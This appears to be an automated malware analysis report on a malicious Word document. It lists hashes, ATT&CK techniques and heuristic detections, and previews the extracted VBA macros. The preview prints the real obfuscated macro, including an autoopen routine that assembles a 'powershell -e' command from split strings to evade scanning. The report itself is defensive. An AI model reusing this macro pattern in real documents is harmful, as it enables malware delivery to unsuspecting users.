Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 52dd153ad00295d5…

MALICIOUS

Office (OLE)

Size: 250.6 KB
Created: 2019-03-14 12:45:00
Authoring application: Microsoft Office Word
First seen: 2019-04-17
MD5: 2bebea77dbd4508eaaec51f8f8c60b49
SHA-1: c88635b5816a88c673aa1d4c7dde95c25555c3ca
SHA-256: 52dd153ad00295d51556ebc3221df7d3df1c9d7b9f34f8ee75c50caaee790c0d
Risk Score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1071.001 Web Protocols

The sample is a malicious Office document containing obfuscated VBA macros, indicated by multiple high and critical heuristic firings including OLE_VBA_SPLIT_KEYWORD_OBFUSCATION and OLE_VBA_PCODE_AUTOEXEC_EXEC. The presence of an AutoOpen macro suggests immediate execution upon opening. The script's complexity and obfuscation point towards downloader or dropper functionality, aiming to fetch and execute further malicious content.

Heuristics 8

  • ClamAV: Doc.Malware.00536d-6903041-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6903041-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 64532 bytes
SHA-256: ca69a065a1b2a841d0fba9fa9d39366d81d3259ee1b5db060da90cecfd4c23f8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wZABUoA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function zAGoAC()
   If jAAB4Ck_ = rBCxxQ_B Then
         ak44ZA = 271973695 * cGA_kQA
         SGAk4_c = HXDkAAX - 311258321 + 498257575 + CAGAoo * 286982383 / 516078218 + 94105495 / Chr(837151160 / CSng(489853335 + Round(w_BAUQ))) + 122260499 * Log(kkQ_Aw) - 510436255 - 288224202 + UkAAcc * CLng(KZAAA4oA - Atn(FAcA4A / 731970903 / 537057685 + YAxAA_X))
         dBDAAAk = 86982876 * I4A1AXo
End If
   If JA1cUA = bAcQwxA Then
         tDBA_ooA = 390620982 * o4AA4_
         VA_CAUD_ = wAU4wBD - 928939651 + 453057314 + VAcAA4 * 912772893 / 704456667 + 936515786 / Chr(922896790 / CSng(777368876 + Round(nAUAkDU))) + 388150530 * Log(WAZAUZc) - 674682276 - 7995171 + zQ_xAQA * CLng(YXAABDAA - Atn(QQAZBo / 778632288 / 462538646 + wAQBcQ))
         Gc4w41Aw = 296606634 * QDAoAA
End If
   If YcAQUDxA = mAAUAGxQ Then
         iwocAQZ = 955911392 * I_A_AAcA
         PQUAcA = lcAA4A - 326949912 + 250048041 + UAoAZBBA * 376028446 / 319911730 + 452654795 / Chr(516859524 / CSng(693005962 + Round(XAABCcD1))) + 492785305 * Log(vkoUAxZ) - 54049405 - 439670656 + MAAAAU * CLng(K1AwAZA - Atn(z1DDAA / 654984861 / 452070899 + IAxAAAwA))
         jAUkCA = 303672909 * moo4AkAA
End If
   If RUAUA_DD = HUQQQwk Then
         wAkAAGGo = 115552566 * wADAAXA
         UBBAAkw = hxUAQ4 - 436278587 + 197166145 + CBBcxAAA * 43459388 / 389595647 + 353931469 / Chr(583466002 / CSng(160181069 + Round(aDAwBG))) + 451858509 * Log(YAAkAQAw) - 293623494 - 245406835 + qBAB4AXA * CLng(sGAAwx - Atn(G4QUZG / 2829049 / 528975163 + ik1ADD))
         fUcoAAwA = 482275114 * pQUAckQ
End If
   If wXAAAAGA = wcGCxAAC Then
         XA4Uw4AA = 697964845 * wcQZDc
         fcXU1Q = SUXCZXQ - 513814839 + 315096524 + qBcQAX4 * 9521099 / 986334461 + 895065140 / Chr(458050695 / CSng(642702398 + Round(lABAA14))) + 976626671 * Log(XZxAQw) - 262281414 - 174873209 + YG4__XU * CLng(dAAQ1A - Atn(NAAABAUA / 250628265 / 179205135 + oA1AcA))
         SAABBU = 564206553 * lUAQAck
End If
   If dAGBBBc = iDBCQGo Then
         pCw4A4oD = 100878973 * CoxDAB
         ZAAwA1BB = CcAAGA - 539451088 + 151252842 + DGZQkX * 412628421 / 782350801 + 355877149 / Chr(501284377 / CSng(525050037 + Round(w_UDUA1))) + 839323189 * Log(wAo_oXDQ) - 271650352 - 880716801 + pAGkkoAw * CLng(TZGUc1B - Atn(ZxAQUAUQ / 591527399 / 74749 + pAkGCG))
         VABDUGDQ = 180568329 * kxXDAc
End If
End Function
Sub autoopen()
On Error Resume Next
   If XUAGBA = EUA_AB Then
         WBD4ADc = 990385443 * GAk1cA
         VxGcDU = rcBAUCwA - 377488494 + 892073252 + ikUABQ11 * 105425530 / 810215553 + 408378595 / Chr(910817880 / CSng(144536488 + Round(Oo__ADc))) + 516882644 * Log(wAXUGAD) - 733103024 - 604770596 + fwAQUc * CLng(iGcBZC - Atn(VAU44UxB / 631839586 / 125419897 + vAXQUkG))
         wADUZU = 746523243 * jAAcGUw
End If
   If LAAXAAAB = K4xAAcQ_ Then
         rUCABxD = 95290319 * BB_4ko
         bCDkUD = NUQADAA - 713433319 + 63857064 + uDAAQUAB * 339489101 / 121822882 + 413736791 / Chr(34219353 / CSng(771474290 + Round(wADUc4B))) + 283574407 * Log(cACwZQQ4) - 183848029 - 866024433 + nAA_ZBA * CLng(nDooQ4D - Atn(RAk_co / 302432888 / 627895022 + uA4DZ1x))
         aDABCD = 786895662 * SCAAAD
End If
   If NZXAkA = jwAAQ4 Then
         WAAwoDU = 320657427 * ND1ABxZA
         fA_AXAG = rAADDAoG - 204512792 + 435663659 + tAD_AAXG * 127361208 / 683411578 + 941046455 / Chr(6291819 / CSng(184945353 + Round(XBAwAAA))) + 773155148 * Log(zAAGA1U) - 427092998 - 682568189 + EQAB_kBA * CLng(vQQAkAXA - Atn(TokAoC / 11257610 / 782710298 + iZD_DQc))
         oAAXADU_ = 234040387 * JGQZQw
End If
WcCUBGox (PBBAoxD + "po" + JADBZAkx + "wersh" + LXkXAwA + "ell -e " + EAG1AA + ocA4cGA_ + UZA4AAAU + HowZGAQ + wCxZ_ACw + JAAAAw + h4BAADA)
   If ZA_AAB = bAAAADx Then
         q4UkBx1G = 261417769 * XAUoC__
         EkCQB
... (truncated)